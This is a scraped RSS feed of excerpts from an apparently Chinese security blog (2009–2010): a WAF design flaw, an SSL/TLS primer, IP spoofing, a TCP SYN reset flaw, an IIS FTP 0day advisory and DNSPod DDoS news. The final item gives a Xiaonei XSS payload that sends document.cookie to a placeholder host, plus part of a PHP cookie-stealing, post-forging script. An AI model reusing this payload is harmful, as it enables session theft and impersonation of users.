http://www.dklkt.cn/ en LBS v2.0.31X Thu, 09 Sep 2010 12:59:15 +0800 60 ]]> Fri, 06 Aug 2010 10:17:44 +0800
更无语的是，apache能直接用sudo以root身份运行命令。假如拿到webshell那么整个系统都在掌握之中。

这显然是架构上的问题。系统设计之初就没有考虑安全问题。因为他们需要php能以root身份运行python脚本。

难道他们这个WAF是只会做软件不懂安全的人搞出来的？不解中。。。。]]> ]]> Thu, 15 Jul 2010 20:29:31 +0800
此外,简单用XOR加密的字符串360杀毒貌似能够解得出来。这个好像还有点牛X的。

免费的东西，期望不要太高，呵呵。]]> ]]> Thu, 11 Mar 2010 21:22:39 +0800 http://www.nsfocus.net/index.php?act=magazine&do=view&mid=841

SSL/TLS/WTLS原理

作者：yawl < yawl@nsfocus.com >
主页：http://www.nsfocus.com
日期：2001-02-19

一 前言

首先要澄清一下名字的混淆：
1 SSL(Secure Socket Layer)是netscape公司设计的主要用于web的安全传输协议。这种协议在WEB上获得了广泛的应用。
2 IETF(www.ietf.org)将SSL作了标准化，即RFC2246,并将其称为TLS（Transport Layer Security），从技术上讲，TLS1.0与SSL3.0的差别非常微小。由于本文中没有涉及两者间的细小差别，本文中这两个名字等价。
3 在WAP的环境下，由于手机及手持设备的处理]]> ]]> Mon, 12 Oct 2009 10:05:14 +0800 http://icylife.net/yunshu/show.php?id=732

   摘要：IP欺骗是个非常困难的事情，传说中也只有凯文米特尼克曾经成功的实现过，不过这个一般人是可望不可即的。但是在特殊条件下，我们则可以比较简单的实现IP欺骗，并利用这个来做一点点事情，比如入侵有IP地址限制的系统。

      举个例子来说，某人已经渗透进入了一个网络，并且在1.2.3.1上面通过ARP欺骗嗅探到了http://1.2.3.4/admin的密码。但是这个系统对登录的源IP地址有限制，至允许来自1.2.3.250的登录。有密码却登录不进去，该如何继续？目前来说，至少有两种办法，最容易想到的是渗透1.2.3.250得到控制权限再登陆或者直接尝试渗透1.2.3.4。另外一种，自然就是IP地址欺骗了。因为是在一个C类网络中，IP地址欺骗实现起来就非常的容易了。
]]> ]]> Wed, 23 Sep 2009 16:52:10 +0800 http://www.cnblogs.com/flier/archive/2004/07/08/22366.aspx

虽然也算是把 TCP/IP Illustrated 三卷大致翻看过一遍，但现在回想起来读的真是很不认真，往往只是对自己感兴趣的地方仔细研究，麻烦的地方点到为止。这次因为那个号称 TCP 原理上存在的漏洞，又涨了一些经验值，原来发送 SYN 包也是可以导致重置 TCP 连接的。
     具体漏洞描述可参考 Vulnerabilities in TCP，因为已经看了一些公司里老大写的内部文档，我就不好对其多做评论了，呵呵
     其原理大概是通过监听、猜测或尝试，向被攻击连接的一方机器发送一个序列号在已建立连接 TCP 窗口中的 SYN 包，导致接收端以为连接无效而重置连接，并向另一端发送 RST 包切断连接。 
     这比传统的向两端发送多个 ]]> ]]> Mon, 07 Sep 2009 16:23:42 +0800

点击此处下载
或者去这里下载：http://www.yxlink.com/html/zhichiyuxiazai/ruanjianxiazai/2009/0904/146.html]]> ]]> Mon, 07 Sep 2009 16:16:52 +0800 http://www.yxlink.com/html/zhichiyuxiazai/ruanjianxiazai/2009/0904/146.html

该漏洞为Windows IIS5&6 的0day漏洞，微软官方尚未推出补丁。铱迅为保证客户的利益，推出免费的临时补丁，请各位客户经快下载并安装该补丁。

发布日期：2009年9月1日

漏洞类型：远程代码执行

漏洞评估：严重

受影响的软件：

Microsoft IIS 6.0

Microsoft IIS 5.0

漏洞描述： 
    Microsoft IIS的FTP服务程序在解析目录名时存在缓冲区溢出漏洞，远程攻击者通过提交包含特殊命名目录的FTP NLST (NAME LIST)命令请求，以触发基于栈的缓冲区溢出，导致攻击者可以以应用程序权限执行任意指令。目前已经有利用该漏洞的攻击程序出现，推荐以下临时性解决方法，以缓解该漏洞对用户的影响：
]]> ]]> Thu, 21 May 2009 22:29:21 +0800     
    我觉得这次事件应该让人思考的不是某私服，不是dnspod,也不是某影音，而是国内的互联网安全现状。
    
    本来，Internet在设计之初就存在着某些缺陷，然而在Internet已经这样大规模应用的情况下，短期内也不可能做出改进。那么，安全问题就是一个很大的隐患。举个例子，超大流量的DDOS根本就没什么办法防范。更何况那些肉鸡都是真实的IP，真实的访问请求。
    
    大家应该看到DNS是很脆弱的，也很重要的。在我们这边，大家的dns服务器都指向218.2.135.1。那么一旦它罢工，至少我们学校，n多企业和单位都不能上网了。这是很可怕的事情。而且短时间内也没有好的替代方法。有几个人上网是输入ip地址的。就算你输入ip地址上网，那么那些有很多主机头的虚拟主机你也没法访问啊。
]]> ]]> Thu, 21 May 2009 09:17:32 +0800 http://tech.sina.com.cn/i/2009-05-21/01463111112.shtml

　　新浪科技讯 5月21日凌晨消息，据多方消息透露，5月19日导致多省网络故障的原因已查明：域名服务商DNSPod遭遇恶意攻击瘫痪，导致其服务对象暴风影音等网站用户提交访问无法找到正确服务器，大量积累访问申请导致电信网络负担，最终导致网络瘫痪。

　　DNSPod遭遇10G流量恶意攻击

　　DNSPod是国内一款免费DNS(域名系统)产品，为同时有电信、网通、教育网服务器的网站提供智能的解析，让电信用户访问电信的服务器，网通的用户访问网通的服务器，达到互联互通的效果。暴风影音也是DNSPod服务对象之一。

　　5月18日晚上22点左右，DNSPod主站及多个DNS服务器遭受超过10G流量的恶意攻击。有知情人士透露，18日当晚DNSPod耗尽了整个机房约三分之一的带宽资源，为了]]> ]]> Sun, 12 Apr 2009 15:38:19 +0800
http://bbs.wolvez.org

校内网在发blog时对插入图片过滤不严格，存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发：
javascript:window.location.href='http://xxxxx/test.php?cookie=&#39;+document cookie 

test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下：
<?php
ob_start(); 
$url = 'blog.xiaonei.com';
$cookie=$_GET['cookie'];
$cookie1=$cookie."\r\n\r\n";
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt

//发一条伪造的日志，这条日志里面也可以插入恶意代码
]]>